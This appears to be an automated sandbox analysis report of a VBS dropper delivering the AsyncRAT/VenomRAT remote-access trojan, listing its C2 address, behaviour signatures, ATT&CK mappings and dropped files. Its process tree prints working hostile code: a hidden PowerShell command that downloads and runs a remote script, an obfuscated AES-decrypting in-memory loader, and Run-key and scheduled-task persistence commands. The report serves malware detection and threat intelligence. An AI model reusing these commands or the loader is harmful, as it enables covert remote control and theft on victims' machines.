asyncrat | 823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 02:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs
Size

67KB
MD5

12d9b975c280a2500a1f13ee88cd5dcc
SHA1

d2ff34e43857aafc57217cfb7cdc5bb3b2825b66
SHA256

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9
SHA512

ec0a70030c775ee18f5482e756e6b4abacdf0e14516335771a8995be7059eb037dc18c27d2844927fdde37b17cae9226f173ffda8334e764f478fe2181a31430
SSDEEP

1536:dha8UpBzancwZOnc9/FQa6vYGl2Yo7ZkeXeFuGbVSPXCAG:7Ur2Ocmo7ZkieFuyIG

Score

10^/10

asyncrat venomrat dec2024 execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Dec2024

45.88.88.7:6845

Mutex

zmkdvkzgwmnzhgvxwwk

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/1232-113-0x0000020582800000-0x0000020582818000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/1232-113-0x0000020582800000-0x0000020582818000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
32	1232	powershell.exe
34	1232	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
4092	powershell.exe
4428	powershell.exe
2056	powershell.exe
2552	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5064	timeout.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4092	powershell.exe
4092	powershell.exe
2912	powershell.exe
2912	powershell.exe
4428	powershell.exe
4428	powershell.exe
1036	powershell.exe
1036	powershell.exe
2056	powershell.exe
2056	powershell.exe
1232	powershell.exe
1232	powershell.exe
2552	powershell.exe
2552	powershell.exe
3468	powershell.exe
3468	powershell.exe
3188	powershell.exe
3188	powershell.exe
1232	powershell.exe
1232	powershell.exe
1232	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	4428	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeIncreaseQuotaPrivilege	1036	powershell.exe
Token: SeSecurityPrivilege	1036	powershell.exe
Token: SeTakeOwnershipPrivilege	1036	powershell.exe
Token: SeLoadDriverPrivilege	1036	powershell.exe
Token: SeSystemProfilePrivilege	1036	powershell.exe
Token: SeSystemtimePrivilege	1036	powershell.exe
Token: SeProfSingleProcessPrivilege	1036	powershell.exe
Token: SeIncBasePriorityPrivilege	1036	powershell.exe
Token: SeCreatePagefilePrivilege	1036	powershell.exe
Token: SeBackupPrivilege	1036	powershell.exe
Token: SeRestorePrivilege	1036	powershell.exe
Token: SeShutdownPrivilege	1036	powershell.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeSystemEnvironmentPrivilege	1036	powershell.exe
Token: SeRemoteShutdownPrivilege	1036	powershell.exe
Token: SeUndockPrivilege	1036	powershell.exe
Token: SeManageVolumePrivilege	1036	powershell.exe
Token: 33	1036	powershell.exe
Token: 34	1036	powershell.exe
Token: 35	1036	powershell.exe
Token: 36	1036	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeIncreaseQuotaPrivilege	2056	powershell.exe
Token: SeSecurityPrivilege	2056	powershell.exe
Token: SeTakeOwnershipPrivilege	2056	powershell.exe
Token: SeLoadDriverPrivilege	2056	powershell.exe
Token: SeSystemProfilePrivilege	2056	powershell.exe
Token: SeSystemtimePrivilege	2056	powershell.exe
Token: SeProfSingleProcessPrivilege	2056	powershell.exe
Token: SeIncBasePriorityPrivilege	2056	powershell.exe
Token: SeCreatePagefilePrivilege	2056	powershell.exe
Token: SeBackupPrivilege	2056	powershell.exe
Token: SeRestorePrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeSystemEnvironmentPrivilege	2056	powershell.exe
Token: SeRemoteShutdownPrivilege	2056	powershell.exe
Token: SeUndockPrivilege	2056	powershell.exe
Token: SeManageVolumePrivilege	2056	powershell.exe
Token: 33	2056	powershell.exe
Token: 34	2056	powershell.exe
Token: 35	2056	powershell.exe
Token: 36	2056	powershell.exe
Token: SeIncreaseQuotaPrivilege	2056	powershell.exe
Token: SeSecurityPrivilege	2056	powershell.exe
Token: SeTakeOwnershipPrivilege	2056	powershell.exe
Token: SeLoadDriverPrivilege	2056	powershell.exe
Token: SeSystemProfilePrivilege	2056	powershell.exe
Token: SeSystemtimePrivilege	2056	powershell.exe
Token: SeProfSingleProcessPrivilege	2056	powershell.exe
Token: SeIncBasePriorityPrivilege	2056	powershell.exe
Token: SeCreatePagefilePrivilege	2056	powershell.exe
Token: SeBackupPrivilege	2056	powershell.exe
Token: SeRestorePrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeSystemEnvironmentPrivilege	2056	powershell.exe
Token: SeRemoteShutdownPrivilege	2056	powershell.exe
Token: SeUndockPrivilege	2056	powershell.exe
Token: SeManageVolumePrivilege	2056	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1232	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3168 wrote to memory of 4092	3168	WScript.exe	83
PID 3168 wrote to memory of 4092	3168	WScript.exe	83
PID 3168 wrote to memory of 3732	3168	WScript.exe	102
PID 3168 wrote to memory of 3732	3168	WScript.exe	102
PID 3732 wrote to memory of 5080	3732	cmd.exe	104
PID 3732 wrote to memory of 5080	3732	cmd.exe	104
PID 5080 wrote to memory of 5092	5080	cmd.exe	106
PID 5080 wrote to memory of 5092	5080	cmd.exe	106
PID 5080 wrote to memory of 2912	5080	cmd.exe	107
PID 5080 wrote to memory of 2912	5080	cmd.exe	107
PID 2912 wrote to memory of 4428	2912	powershell.exe	108
PID 2912 wrote to memory of 4428	2912	powershell.exe	108
PID 2912 wrote to memory of 1036	2912	powershell.exe	109
PID 2912 wrote to memory of 1036	2912	powershell.exe	109
PID 2912 wrote to memory of 2056	2912	powershell.exe	112
PID 2912 wrote to memory of 2056	2912	powershell.exe	112
PID 2912 wrote to memory of 4012	2912	powershell.exe	114
PID 2912 wrote to memory of 4012	2912	powershell.exe	114
PID 4012 wrote to memory of 1792	4012	cmd.exe	116
PID 4012 wrote to memory of 1792	4012	cmd.exe	116
PID 1792 wrote to memory of 4804	1792	cmd.exe	118
PID 1792 wrote to memory of 4804	1792	cmd.exe	118
PID 1792 wrote to memory of 1232	1792	cmd.exe	119
PID 1792 wrote to memory of 1232	1792	cmd.exe	119
PID 1232 wrote to memory of 2552	1232	powershell.exe	120
PID 1232 wrote to memory of 2552	1232	powershell.exe	120
PID 1232 wrote to memory of 3468	1232	powershell.exe	121
PID 1232 wrote to memory of 3468	1232	powershell.exe	121
PID 5080 wrote to memory of 5064	5080	cmd.exe	123
PID 5080 wrote to memory of 5064	5080	cmd.exe	123
PID 1232 wrote to memory of 3188	1232	powershell.exe	124
PID 1232 wrote to memory of 3188	1232	powershell.exe	124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
      4⤵
      PID:5092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\system')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 82953' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network82953Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network82953Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network82953Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network82953Man.cmd';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
        7⤵
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1232
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network82953Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 82953' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network82953Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3188
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:5064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0610ff750e2604faba4733abd48fd73a

SHA1
1a561ce48f49bca728b70b4c114fa27b23dd7dc2

SHA256
fdc9aebca677a3abacdb5d191549012afef9ab6ffb9963156d8c2470002fc382

SHA512
f4eb3bc6585b49d4002b99f852ef4546790e2c520c49c6b77b1892eda83581446306617974977ecadecd00ccdb0522962f5e04d3ad78654508aac547f8e7d8bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc2ce575753731574bf10ff6e5162032

SHA1
b660e5156f97af770e5d359fdd2a6ea697f359fb

SHA256
c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa

SHA512
715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8432f55d21c034cd767d75efdbd407e0

SHA1
d2163aac34f4277bd55162f2609c853348852869

SHA256
62f2b61b88e4cfae117a2bb2f93201b161ef0260de36492bb75194edb4bae27e

SHA512
6c191d49f01f7efba21f0dd438fe57efb1a9051ecd39adcaddf983341e1e0cd9740013fc56af43b4bb84e602320af27e756685b6b02e60adc2d6c611c4739368

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
939745637518359af46a6201bd331902

SHA1
cbf9cdbb781a612c2c789198b460046672472f03

SHA256
d5e97cf63d863384075c83d584b337d73fb0fe95cf34e42717ebff983b9552e8

SHA512
ec383ba166001ec41ab692e8b5ac5c6de9ad7b62a8b193b16c169fbcab2158c0a9a701b7b71973bda25ce6aee6bcfa0a456d3237aea66dd6fe8232da902f372b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mafecbp3.0ny.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
63de01f12144baf2b505f8eea95ae3a9

SHA1
b1428ef307e63503219af46059b89fb60487f7c4

SHA256
32d96866203a868b1d4f28560239e66421b412cfa184a876485c39da56f3d979

SHA512
de86970f4eff4a449eaf2d992da255b020c6e384c97d02c3e05ea07bb2a67d543d1701c7beed9a23bb88d82097728ad6b4fb452ac48182b44a894a15bcf712d0

Download Submit
memory/1232-113-0x0000020582800000-0x0000020582818000-memory.dmp

Filesize
96KB

Download
memory/2912-44-0x000001A55D870000-0x000001A55D880000-memory.dmp

Filesize
64KB

Download
memory/2912-32-0x000001A55DA90000-0x000001A55DAD4000-memory.dmp

Filesize
272KB

Download
memory/2912-33-0x000001A55DB60000-0x000001A55DBD6000-memory.dmp

Filesize
472KB

Download
memory/4092-0-0x00007FFD9D8C3000-0x00007FFD9D8C5000-memory.dmp

Filesize
8KB

Download
memory/4092-17-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4092-14-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4092-13-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4092-12-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4092-11-0x00007FFD9D8C0000-0x00007FFD9E381000-memory.dmp

Filesize
10.8MB

Download
memory/4092-1-0x000001B5F2430000-0x000001B5F2452000-memory.dmp

Filesize
136KB

Download